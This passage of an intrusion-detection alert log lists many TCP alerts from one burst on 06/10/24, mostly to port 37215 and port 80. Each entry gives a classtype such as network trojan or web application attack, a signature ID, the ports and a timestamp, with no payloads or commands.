              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.268090
              SID:2835222
              Source Port:59132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.201993
              SID:2835222
              Source Port:34464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.206692
              SID:2835222
              Source Port:47676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.844763
              SID:2835222
              Source Port:55898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.506945
              SID:2835222
              Source Port:38860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.255183
              SID:2829579
              Source Port:55170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.845835
              SID:2835222
              Source Port:58594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.191076
              SID:2030092
              Source Port:34794
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.727944
              SID:2835222
              Source Port:44684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.039203
              SID:2829579
              Source Port:46642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.793700
              SID:2829579
              Source Port:44336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.320455
              SID:2030092
              Source Port:36680
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.034176
              SID:2835222
              Source Port:36348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.916548
              SID:2835222
              Source Port:50156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.801648
              SID:2829579
              Source Port:42440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.188584
              SID:2030092
              Source Port:38476
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.833196
              SID:2829579
              Source Port:56460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.781625
              SID:2829579
              Source Port:39322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.929860
              SID:2835222
              Source Port:33796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.776818
              SID:2025883
              Source Port:59898
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.962891
              SID:2835222
              Source Port:58138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.491767
              SID:2829579
              Source Port:59288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.222372
              SID:2835222
              Source Port:57074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.228570
              SID:2835222
              Source Port:54124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.310242
              SID:2030092
              Source Port:47818
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.745869
              SID:2030092
              Source Port:37862
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.738142
              SID:2829579
              Source Port:44866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.950533
              SID:2835222
              Source Port:38960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.140610
              SID:2030092
              Source Port:49986
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.009869
              SID:2835222
              Source Port:32966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.615090
              SID:2835222
              Source Port:52872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.232831
              SID:2829579
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.873305
              SID:2835222
              Source Port:55624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.816370
              SID:2829579
              Source Port:56330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.185349
              SID:2829579
              Source Port:60220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.567099
              SID:2829579
              Source Port:45438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.799993
              SID:2835222
              Source Port:33426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.087126
              SID:2025883
              Source Port:38432
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.260368
              SID:2030092
              Source Port:33388
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.036323
              SID:2829579
              Source Port:50702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.171505
              SID:2030092
              Source Port:59408
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.722392
              SID:2835222
              Source Port:52368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.960374
              SID:2835222
              Source Port:56034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.163354
              SID:2030092
              Source Port:46394
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.265357
              SID:2835222
              Source Port:51268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.167791
              SID:2829579
              Source Port:59702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.256334
              SID:2030092
              Source Port:57332
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.098347
              SID:2030092
              Source Port:46904
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.783251
              SID:2835222
              Source Port:39562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.172737
              SID:2030092
              Source Port:50846
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.130779
              SID:2030092
              Source Port:38916
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.733766
              SID:2835222
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.187605
              SID:2835222
              Source Port:46806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.696885
              SID:2835222
              Source Port:56356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.860897
              SID:2030092
              Source Port:56400
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.083879
              SID:2025883
              Source Port:45866
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.924273
              SID:2835222
              Source Port:55322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.818643
              SID:2835222
              Source Port:60054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.256609
              SID:2835222
              Source Port:32906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.086431
              SID:2025883
              Source Port:35036
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.496645
              SID:2829579
              Source Port:44582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.208229
              SID:2835222
              Source Port:58864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.662261
              SID:2829579
              Source Port:49490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.263058
              SID:2030092
              Source Port:39616
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.489622
              SID:2835222
              Source Port:36090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.092323
              SID:2030092
              Source Port:38082
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.986004
              SID:2835222
              Source Port:53016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.032058
              SID:2835222
              Source Port:51814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.241407
              SID:2835222
              Source Port:49198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.836086
              SID:2030092
              Source Port:40004
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.220635
              SID:2829579
              Source Port:34654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.809845
              SID:2835222
              Source Port:54624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.858870
              SID:2030092
              Source Port:34410
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.180724
              SID:2835222
              Source Port:45616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.743038
              SID:2835222
              Source Port:56570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.771027
              SID:2829579
              Source Port:35570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.206271
              SID:2030092
              Source Port:57210
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.504277
              SID:2835222
              Source Port:55388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.854316
              SID:2030092
              Source Port:49022
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.199727
              SID:2835222
              Source Port:35058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.289047
              SID:2030092
              Source Port:55132
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.231760
              SID:2030092
              Source Port:43428
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.859446
              SID:2835222
              Source Port:55734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.796621
              SID:2835222
              Source Port:51590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.655152
              SID:2835222
              Source Port:48126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.910934
              SID:2829579
              Source Port:47504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.972189
              SID:2829579
              Source Port:41548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.849196
              SID:2835222
              Source Port:41440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.718331
              SID:2835222
              Source Port:51422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.262299
              SID:2835222
              Source Port:47796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.487616
              SID:2835222
              Source Port:38160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.807666
              SID:2835222
              Source Port:51654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.006377
              SID:2835222
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.952158
              SID:2829579
              Source Port:58850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.653727
              SID:2835222
              Source Port:38800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.982567
              SID:2835222
              Source Port:60620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.162192
              SID:2030092
              Source Port:47272
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.493155
              SID:2835222
              Source Port:46310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.243236
              SID:2835222
              Source Port:34724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.770031
              SID:2829579
              Source Port:35782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.011379
              SID:2835222
              Source Port:43896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.806681
              SID:2835222
              Source Port:58028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.706858
              SID:2829579
              Source Port:54022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.906256
              SID:2829579
              Source Port:33836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.654413
              SID:2835222
              Source Port:54110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.856030
              SID:2835222
              Source Port:46888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.968821
              SID:2829579
              Source Port:45692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.750600
              SID:2835222
              Source Port:48216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.756024
              SID:2835222
              Source Port:37358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.811819
              SID:2829579
              Source Port:49442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.941715
              SID:2835222
              Source Port:41282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.924570
              SID:2835222
              Source Port:57234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.034890
              SID:2829579
              Source Port:34742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.205682
              SID:2030092
              Source Port:48150
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.679364
              SID:2835222
              Source Port:55308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.024876
              SID:2829579
              Source Port:49654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.238848
              SID:2829579
              Source Port:56428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.179963
              SID:2835222
              Source Port:44542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.242237
              SID:2829579
              Source Port:45198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.686166
              SID:2829579
              Source Port:42686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.861461
              SID:2829579
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.849795
              SID:2025883
              Source Port:49620
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.845254
              SID:2030092
              Source Port:60926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.657974
              SID:2835222
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.229452
              SID:2835222
              Source Port:52390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.206841
              SID:2030092
              Source Port:44322
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.032756
              SID:2835222
              Source Port:42506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.249566
              SID:2829579
              Source Port:49874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.784346
              SID:2829579
              Source Port:39098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.293187
              SID:2030092
              Source Port:48638
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.182601
              SID:2030092
              Source Port:49626
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.872396
              SID:2835222
              Source Port:33202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.753767
              SID:2829579
              Source Port:32970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.874286
              SID:2829579
              Source Port:60666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.198882
              SID:2829579
              Source Port:40706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.125008
              SID:2030092
              Source Port:46494
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.326758
              SID:2030092
              Source Port:56960
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.509844
              SID:2835222
              Source Port:49560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.997798
              SID:2835222
              Source Port:42556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.099010
              SID:2030092
              Source Port:43804
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.693449
              SID:2829579
              Source Port:37908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.817519
              SID:2829579
              Source Port:60560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.190865
              SID:2835222
              Source Port:32862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.833827
              SID:2025883
              Source Port:51492
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.773931
              SID:2829579
              Source Port:60466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.956930
              SID:2829579
              Source Port:39354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.231115
              SID:2829579
              Source Port:34872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.905259
              SID:2829579
              Source Port:39822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.295761
              SID:2030092
              Source Port:37022
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.987736
              SID:2835222
              Source Port:37842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.766582
              SID:2835222
              Source Port:52936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.866129
              SID:2025883
              Source Port:52018
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.919148
              SID:2835222
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.953764
              SID:2829579
              Source Port:58684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.781384
              SID:2030092
              Source Port:37506
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.940258
              SID:2829579
              Source Port:49626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.084446
              SID:2030092
              Source Port:43700
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.806758
              SID:2030092
              Source Port:40556
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.951337
              SID:2835222
              Source Port:38428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.250289
              SID:2835222
              Source Port:58062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.091217
              SID:2030092
              Source Port:55178
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.204323
              SID:2829579
              Source Port:45564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.764373
              SID:2829579
              Source Port:43254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.853487
              SID:2835222
              Source Port:37098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.131522
              SID:2030092
              Source Port:42740
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.198032
              SID:2829579
              Source Port:54544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.308830
              SID:2030092
              Source Port:53204
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.824797
              SID:2835222
              Source Port:49450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.835522
              SID:2835222
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.250990
              SID:2835222
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.204471
              SID:2030092
              Source Port:37872
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.939523
              SID:2829579
              Source Port:56768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.322475
              SID:2030092
              Source Port:39382
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.805331
              SID:2829579
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.005516
              SID:2835222
              Source Port:53026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.258740
              SID:2835222
              Source Port:53884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.175217
              SID:2030092
              Source Port:34330
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.914938
              SID:2835222
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.008064
              SID:2835222
              Source Port:39324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.290844
              SID:2030092
              Source Port:46446
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.868776
              SID:2030092
              Source Port:42046
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.944688
              SID:2835222
              Source Port:46644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.209800
              SID:2835222
              Source Port:46028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.248812
              SID:2835222
              Source Port:33070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.186102
              SID:2829579
              Source Port:53280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.694481
              SID:2829579
              Source Port:51728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.109647
              SID:2030092
              Source Port:53966
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.258309
              SID:2030092
              Source Port:58242
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.114754
              SID:2030092
              Source Port:52392
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.644240
              SID:2829579
              Source Port:50450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.160015
              SID:2829579
              Source Port:44468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.240413
              SID:2030092
              Source Port:38658
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.840962
              SID:2829579
              Source Port:38198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.646438
              SID:2835222
              Source Port:45280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.027699
              SID:2835222
              Source Port:55096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.270805
              SID:2835222
              Source Port:57758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.109019
              SID:2030092
              Source Port:60560
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.202797
              SID:2829579
              Source Port:49114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.161493
              SID:2835222
              Source Port:33540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.506272
